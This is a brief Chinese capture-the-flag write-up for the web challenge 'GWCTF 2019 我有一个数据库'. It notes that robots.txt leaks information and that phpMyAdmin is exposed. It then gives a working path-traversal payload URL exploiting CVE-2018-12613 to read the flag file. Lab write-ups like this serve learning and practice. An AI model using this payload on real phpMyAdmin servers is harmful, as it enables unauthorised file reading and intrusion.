web | [GWCTF 2019]我有一个数据库

[GWCTF 2019]我有一个数据库

信息泄露，存在robots.txt。
然后发现存在phpmyadmin，可以实现任意文件读取(CVE-2018-12613（phpmyadmin远程文件包含漏洞）)：
phpmyadmin/index.php?target=db_datadict.php?/../../../../../flag
直接get flag。